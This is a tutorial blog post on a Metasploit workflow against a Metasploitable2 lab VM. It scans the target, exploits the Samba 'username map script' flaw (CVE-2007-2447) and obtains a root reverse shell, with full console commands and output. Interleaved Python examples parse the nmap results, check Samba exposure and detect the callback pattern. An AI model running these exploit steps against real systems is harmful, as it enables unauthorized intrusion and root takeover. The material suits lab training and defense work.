
Metasploit Penetration Testing Workflow

Linux | novadmin

What Metasploit is will not be introduced here; a web search turns up plenty. The general penetration-testing approach consists of the following steps:

  1. Scan the target host with Nmap to obtain the host's vulnerability information
  2. In msfconsole, search for the modules that match the software found
  3. Load the module with the use command
  4. View the module's information with the info command
  5. Select a payload for the attack
  6. Set the required parameters
  7. Launch the exploit

This test uses Metasploitable2 as the target machine; Metasploitable2 can be downloaded from Baidu Netdisk.

Here the IP address of my Metasploit host is 192.168.1.63/24

The target machine's address is 192.168.1.79/24

1. Scan the host to obtain vulnerability information

Start Metasploit


#msfconsole

Because Nmap is tightly integrated with Metasploit, nmap can be called directly from within msfconsole:


msf > nmap -sV 192.168.1.79
[*] exec: nmap -sV 192.168.1.79

Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-13 13:43 CST
Nmap scan report for bogon (192.168.1.79)
Host is up (0.00021s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec?
513/tcp  open  login?
514/tcp  open  shell?
1099/tcp open  rmiregistry GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port514-TCP:V=7.70%I=7%D=7/13%Time=5B483C1A%P=i686-pc-linux-gnu%r(NULL,
SF:28,"\x01Host\x20address\x20mismatch\x20for\x20192\.168\.1\.63\n");
MAC Address: 00:0C:29:F2:1C:1D (VMware)
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.09 seconds

The output shows a Samba service on port 139; this test takes the Samba service as its example. The service name and version are also visible: the service is Samba, in the 3.X - 4.X version range.
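The nmap -sV table above is the raw material for everything that follows, so it is worth turning it into structured records rather than reading it by eye. The following is an added example (not code from the original post or from the Nmap or Metasploit projects): it parses the service table with a regular expression, pulls out the Samba entries, and lists the open cleartext services (ftp, telnet, the r-services on 512-514) that a defender would want to retire. The sample input is constructed from a few lines of the scan shown above; the CLEARTEXT set is an assumption of this example, not an Nmap classification.

```python
import re

# Constructed sample input: a handful of lines copied from the nmap -sV output above.
NMAP_OUTPUT = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec?
1524/tcp open  bindshell   Metasploitable root shell
6000/tcp open  X11         (access denied)
"""

# port/proto, state, service, and an optional free-text version column
LINE_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Services that carry credentials or commands in the clear (assumption of this example)
CLEARTEXT = {"ftp", "telnet", "exec", "login", "shell"}


def parse_nmap_services(text):
    """Parse the PORT/STATE/SERVICE/VERSION table of `nmap -sV` into dicts."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:  # header, banner and footer lines do not match
            continue
        port, proto, state, service, version = m.groups()
        records.append({
            "port": int(port),
            "proto": proto,
            "state": state,
            # nmap appends '?' when the service name is only a guess
            "service": service.rstrip("?"),
            "guessed": service.endswith("?"),
            "version": (version or "").strip(),
        })
    return records


def find_product(records, keyword):
    """Return records whose service or version column mentions `keyword`."""
    kw = keyword.lower()
    return [r for r in records
            if kw in r["service"].lower() or kw in r["version"].lower()]


def cleartext_services(records):
    """Open ports running protocols from the CLEARTEXT set, sorted by port."""
    return sorted(r["port"] for r in records
                  if r["state"] == "open" and r["service"] in CLEARTEXT)


if __name__ == "__main__":
    recs = parse_nmap_services(NMAP_OUTPUT)
    for r in find_product(recs, "samba"):
        print(f"{r['port']}/{r['proto']} {r['service']}: {r['version']}")
    print("cleartext services on ports:", cleartext_services(recs))
```

The parser only understands the fixed four-column layout; the trailing fingerprint (SF-Port...) and the "Service Info" line are ignored because they do not start with a port number, which is exactly what the regular expression anchors on.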

2. Use the search command to find related vulnerability information:


msf > search samba

Matching Modules
================

   Name                                                 Disclosure Date  Rank       Description
   ----                                                 ---------------  ----       -----------
   auxiliary/admin/smb/samba_symlink_traversal                           normal     Samba Symlink Directory Traversal
   auxiliary/dos/samba/lsa_addprivs_heap                                 normal     Samba lsa_io_privilege_set Heap Overflow
   auxiliary/dos/samba/lsa_transnames_heap                               normal     Samba lsa_io_trans_names Heap Overflow
   auxiliary/dos/samba/read_nttrans_ea_list                              normal     Samba read_nttrans_ea_list Integer Overflow
   auxiliary/scanner/rsync/modules_list                                  normal     List Rsync Modules
   auxiliary/scanner/smb/smb_uninit_cred                                 normal     Samba _netr_ServerPasswordSet Uninitialized Credential State
   exploit/freebsd/samba/trans2open                     2003-04-07       great      Samba trans2open Overflow (*BSD x86)
   exploit/linux/samba/chain_reply                      2010-06-16       good       Samba chain_reply Memory Corruption (Linux x86)
   exploit/linux/samba/is_known_pipename                2017-03-24       excellent  Samba is_known_pipename() Arbitrary Module Load
   exploit/linux/samba/lsa_transnames_heap              2007-05-14       good       Samba lsa_io_trans_names Heap Overflow
   exploit/linux/samba/setinfopolicy_heap               2012-04-10       normal     Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   exploit/linux/samba/trans2open                       2003-04-07       great      Samba trans2open Overflow (Linux x86)
   exploit/multi/samba/nttrans                          2003-04-07       average    Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   exploit/multi/samba/usermap_script                   2007-05-14       excellent  Samba "username map script" Command Execution
   exploit/osx/samba/lsa_transnames_heap                2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
   exploit/osx/samba/trans2open                         2003-04-07       great      Samba trans2open Overflow (Mac OS X PPC)
   exploit/solaris/samba/lsa_transnames_heap            2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
   exploit/solaris/samba/trans2open                     2003-04-07       great      Samba trans2open Overflow (Solaris SPARC)
   exploit/unix/http/quest_kace_systems_management_rce  2018-05-31       excellent  Quest KACE Systems Management Command Injection
   exploit/unix/misc/distcc_exec                        2002-02-01       excellent  DistCC Daemon Command Execution
   exploit/unix/webapp/citrix_access_gateway_exec       2010-12-21       excellent  Citrix Access Gateway Command Execution
   exploit/windows/fileformat/ms14_060_sandworm         2014-10-14       excellent  MS14-060 Microsoft Windows OLE Package Manager Code Execution
   exploit/windows/http/sambar6_search_results          2003-06-21       normal     Sambar 6 Search Results Buffer Overflow
   exploit/windows/license/calicclnt_getconfig          2005-03-02       average    Computer Associates License Client GETCONFIG Overflow
   exploit/windows/smb/group_policy_startup             2015-01-26       manual     Group Policy Script Execution From Shared Resource
   post/linux/gather/enum_configs                                        normal     Linux Gather Configurations

Note:

Rank indicates the module's rating. The rank of an exploit module matters a great deal: choose excellent first, then great; modules with other ranks are either not very good or not reliably effective.

Here we use the following module:


 exploit/multi/samba/usermap_script                   2007-05-14       excellent  Samba "username map script" Command Execution

3. In msfconsole, load the module with the use command


msf > use exploit/multi/samba/usermap_script
msf exploit(multi/samba/usermap_script) > 


4. View the module's details with info


msf exploit(multi/samba/usermap_script) > info

       Name: Samba "username map script" Command Execution
     Module: exploit/multi/samba/usermap_script
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2007-05-14

Provided by:
  jduck <jduck@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST                   yes       The target address
  RPORT  139              yes       The target port (TCP)

Payload information:
  Space: 1024

Description:
  This module exploits a command execution vulnerability in Samba 
  versions 3.0.20 through 3.0.25rc3 when using the non-default 
  "username map script" configuration option. By specifying a username 
  containing shell meta characters, attackers can execute arbitrary 
  commands. No authentication is needed to exploit this vulnerability 
  since this option is used to map usernames prior to authentication!

References:
  https://cvedetails.com/cve/CVE-2007-2447/
  OSVDB (34700)
  http://www.securityfocus.com/bid/23972
  http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
  http://samba.org/samba/security/CVE-2007-2447.html
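The module description above states the two conditions that make a Samba host exposed to CVE-2007-2447: a version from 3.0.20 through 3.0.25rc3, and the non-default "username map script" option being set. Those two conditions are what an administrator should audit for, so the following added example (not code from the original post or from the Samba or Metasploit projects) turns them into a check: it compares a Samba version string against the affected range, treating release candidates as older than the final release, and looks for an active "username map script" line in smb.conf text. The two smb.conf samples and the script path in them are constructed for the example.

```python
import re

# Affected range quoted from the module description above
AFFECTED_LOW = "3.0.20"
AFFECTED_HIGH = "3.0.25rc3"

# Constructed smb.conf fragments; the script path is made up for the example
VULNERABLE_CONF = """\
[global]
   workgroup = WORKGROUP
   username map script = /etc/samba/scripts/mapusers.sh
"""
SAFE_CONF = """\
[global]
   workgroup = WORKGROUP
   # username map script = /etc/samba/scripts/mapusers.sh
"""

VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:rc(\d+)|([a-z]))?")


def version_key(version):
    """Sortable tuple for a Samba version such as '3.0.25rc3', '3.0.25' or '3.0.25a'.

    A release candidate sorts below the final release, and a lettered
    maintenance release ('3.0.25a') sorts above it.
    """
    core = version.strip().split("-")[0]  # drop packaging suffixes such as '-Debian'
    m = VERSION_RE.fullmatch(core)
    if not m:
        raise ValueError(f"unrecognised Samba version: {version!r}")
    major, minor, patch, rc, letter = m.groups()
    if rc:
        tail = (0, int(rc))
    elif letter:
        tail = (2, ord(letter) - ord("a") + 1)
    else:
        tail = (1, 0)
    return (int(major), int(minor), int(patch)) + tail


def version_in_affected_range(version):
    return version_key(AFFECTED_LOW) <= version_key(version) <= version_key(AFFECTED_HIGH)


def username_map_script(smb_conf):
    """Return the value of 'username map script' from smb.conf text, or None if it is unset or commented out."""
    for raw in smb_conf.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        # smb.conf keys are case-insensitive and tolerate extra whitespace
        if " ".join(key.split()).lower() == "username map script":
            return value.strip()
    return None


def exposed_to_cve_2007_2447(version, smb_conf):
    """True only when both conditions from the module description hold."""
    return version_in_affected_range(version) and username_map_script(smb_conf) is not None


if __name__ == "__main__":
    for ver in ("3.0.20", "3.0.25rc3", "3.0.25", "3.0.25a"):
        print(ver, "affected" if version_in_affected_range(ver) else "not affected")
    print("vulnerable config exposed:", exposed_to_cve_2007_2447("3.0.22", VULNERABLE_CONF))
    print("commented-out config exposed:", exposed_to_cve_2007_2447("3.0.22", SAFE_CONF))
```

On a real host the version comes from `smbd -V` and the configuration from `testparm -s`, which expands includes and normalises the keys; the check above deliberately keeps both inputs as plain strings so it can be run offline against collected data.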


5. Select a payload module


msf exploit(multi/samba/usermap_script) > show payloads

Compatible Payloads
===================

   Name                                Disclosure Date  Rank    Description
   ----                                ---------------  ----    -----------
   cmd/unix/bind_awk                                    normal  Unix Command Shell, Bind TCP (via AWK)
   cmd/unix/bind_inetd                                  normal  Unix Command Shell, Bind TCP (inetd)
   cmd/unix/bind_lua                                    normal  Unix Command Shell, Bind TCP (via Lua)
   cmd/unix/bind_netcat                                 normal  Unix Command Shell, Bind TCP (via netcat)
   cmd/unix/bind_netcat_gaping                          normal  Unix Command Shell, Bind TCP (via netcat -e)
   cmd/unix/bind_netcat_gaping_ipv6                     normal  Unix Command Shell, Bind TCP (via netcat -e) IPv6
   cmd/unix/bind_perl                                   normal  Unix Command Shell, Bind TCP (via Perl)
   cmd/unix/bind_perl_ipv6                              normal  Unix Command Shell, Bind TCP (via perl) IPv6
   cmd/unix/bind_r                                      normal  Unix Command Shell, Bind TCP (via R)
   cmd/unix/bind_ruby                                   normal  Unix Command Shell, Bind TCP (via Ruby)
   cmd/unix/bind_ruby_ipv6                              normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
   cmd/unix/bind_socat_udp                              normal  Unix Command Shell, Bind UDP (via socat)
   cmd/unix/bind_zsh                                    normal  Unix Command Shell, Bind TCP (via Zsh)
   cmd/unix/generic                                     normal  Unix Command, Generic Command Execution
   cmd/unix/reverse                                     normal  Unix Command Shell, Double Reverse TCP (telnet)
   cmd/unix/reverse_awk                                 normal  Unix Command Shell, Reverse TCP (via AWK)
   cmd/unix/reverse_bash_telnet_ssl                     normal  Unix Command Shell, Reverse TCP SSL (telnet)
   cmd/unix/reverse_ksh                                 normal  Unix Command Shell, Reverse TCP (via Ksh)
   cmd/unix/reverse_lua                                 normal  Unix Command Shell, Reverse TCP (via Lua)
   cmd/unix/reverse_ncat_ssl                            normal  Unix Command Shell, Reverse TCP (via ncat)
   cmd/unix/reverse_netcat                              normal  Unix Command Shell, Reverse TCP (via netcat)
   cmd/unix/reverse_netcat_gaping                       normal  Unix Command Shell, Reverse TCP (via netcat -e)
   cmd/unix/reverse_openssl                             normal  Unix Command Shell, Double Reverse TCP SSL (openssl)
   cmd/unix/reverse_perl                                normal  Unix Command Shell, Reverse TCP (via Perl)
   cmd/unix/reverse_perl_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via perl)
   cmd/unix/reverse_php_ssl                             normal  Unix Command Shell, Reverse TCP SSL (via php)
   cmd/unix/reverse_python                              normal  Unix Command Shell, Reverse TCP (via Python)
   cmd/unix/reverse_python_ssl                          normal  Unix Command Shell, Reverse TCP SSL (via python)
   cmd/unix/reverse_r                                   normal  Unix Command Shell, Reverse TCP (via R)
   cmd/unix/reverse_ruby                                normal  Unix Command Shell, Reverse TCP (via Ruby)
   cmd/unix/reverse_ruby_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via Ruby)
   cmd/unix/reverse_socat_udp                           normal  Unix Command Shell, Reverse UDP (via socat)
   cmd/unix/reverse_ssl_double_telnet                   normal  Unix Command Shell, Double Reverse TCP SSL (telnet)
   cmd/unix/reverse_zsh                                 normal  Unix Command Shell, Reverse TCP (via Zsh)

As the list shows, there are many payloads; the details of each can be looked up.

When choosing an attack payload, payloads related to meterpreter and reverse connections are recommended; this time we use:


cmd/unix/reverse                                     normal  Unix Command Shell, Double Reverse TCP (telnet)

Usage:



msf exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse

If no error is reported, the payload was set successfully.

6. Set the attack parameters

First, view the parameters that need to be filled in with show options (or just options):


msf exploit(multi/samba/usermap_script) > options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.63     yes       The listen address (an interface may be specified)
   LPORT  4445             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(multi/samba/usermap_script) > 

Parameters whose Required column says yes must be set; above, only the four parameters RHOST, RPORT, LHOST and LPORT are required.

RHOST: the target machine, i.e. the IP address of the machine being attacked

RPORT: the service port number on the target

LHOST: the local host's IP address

LPORT: a local port number on which the channel back from the target is established.

Set each of them in turn:


msf exploit(multi/samba/usermap_script) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(multi/samba/usermap_script) > set RPORT 139
RPORT => 139
msf exploit(multi/samba/usermap_script) > set LHOST 192.168.1.63
LHOST => 192.168.1.63
msf exploit(multi/samba/usermap_script) > set LPORT 4445
LPORT => 4445

7. Start the exploit

Some modules support the check command to verify whether anything is set up wrong; this module does not provide check, so the exploit or run command can be used directly to launch the attack:


msf exploit(multi/samba/usermap_script) > check
[*] 192.168.1.79:139 This module does not support check.
msf exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP double handler on 192.168.1.63:4445 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo LqeeGpfjkc61Y8Jw;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "LqeeGpfjkc61Y8Jw\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (192.168.1.63:4445 -> 192.168.1.79:55748) at 2018-07-13 14:03:33 +0800

The output shows that a connection has been established; commands can now be run in the session to view the IP address, hostname and privilege level:


ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:f2:1c:1d  
          inet addr:192.168.1.79  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fef2:1c1d/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:99250 errors:0 dropped:0 overruns:0 frame:0
          TX packets:28036 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:6968942 (6.6 MB)  TX bytes:2673571 (2.5 MB)
          Interrupt:19 Base address:0x2000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:1624 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1624 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:783809 (765.4 KB)  TX bytes:783809 (765.4 KB)

uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
whoami
root
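The handler log above has a distinctive network shape from the target's side: right after an inbound connection to its SMB port, the file server itself opens two outbound connections back to the same peer on an unusual port (55747 and 55748 to 4445 here, since the "double" telnet payload needs one socket per direction). That is the pattern a defender can look for in connection logs. The following is an added detection example (not code from the original post or from Metasploit): over constructed flow records modelled on the session above, it flags outbound connections from a host that has just received an SMB connection, when those connections go back to the SMB peer within a short window, and it counts them per peer and port. The flow records, timestamps, the 30-second window and the allow list of expected outbound ports are all assumptions of this example.

```python
from collections import namedtuple

Flow = namedtuple("Flow", "ts src sport dst dport")

# Constructed flow records (timestamps are made up): an inbound SMB connection to
# 192.168.1.79, then two outbound connections from it back to the peer on 4445,
# followed by two unrelated benign flows.
FLOWS = [
    Flow(1000.0, "192.168.1.63", 51022, "192.168.1.79", 139),
    Flow(1001.2, "192.168.1.79", 55747, "192.168.1.63", 4445),
    Flow(1001.3, "192.168.1.79", 55748, "192.168.1.63", 4445),
    Flow(1120.0, "192.168.1.50", 40011, "192.168.1.79", 445),  # normal share access
    Flow(1121.0, "192.168.1.79", 33001, "192.168.1.20", 53),   # normal DNS lookup
]

SMB_PORTS = {139, 445}
# Ports a file server is expected to talk to on its own (assumed allow list)
EXPECTED_OUTBOUND = {53, 88, 389, 636}


def find_callbacks(flows, window=30.0):
    """Pair each suspicious outbound flow with the inbound SMB flow that preceded it.

    A flow is suspicious when its source is a host that received an SMB
    connection, its destination is that SMB client, it is not on the allow
    list, and it starts within `window` seconds after the inbound flow.
    """
    inbound = [f for f in flows if f.dport in SMB_PORTS]
    hits = []
    for f in flows:
        if f.dport in EXPECTED_OUTBOUND:
            continue
        for i in inbound:
            if f.src == i.dst and f.dst == i.src and 0 <= f.ts - i.ts <= window:
                hits.append((i, f))
                break
    return hits


def summarize(hits):
    """Count callbacks per (server, peer, destination port); 2 matches the double handler above."""
    counts = {}
    for _, f in hits:
        key = (f.src, f.dst, f.dport)
        counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == "__main__":
    for inbound, outbound in find_callbacks(FLOWS):
        print(f"{outbound.src} called back to {outbound.dst}:{outbound.dport} "
              f"{outbound.ts - inbound.ts:.1f}s after SMB connection from {inbound.src}")
    print(summarize(find_callbacks(FLOWS)))
```

The logic is a correlation rule, not a signature: it does not depend on the payload type, only on the file server initiating connections back to a client that had just connected to it. A server that legitimately connects back to clients (for example, for printing) would need those ports added to the allow list to avoid noise.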

This completes a basic penetration-testing process.

Of course, in practice things are rarely this smooth: whether there is a firewall, and whether the host sits behind NAT or on an internal rather than external network, are all things we need to understand. The information-gathering phase is often the most important part of a penetration test: information about the target is collected through every available channel, and the more information we have, the better for the tester.
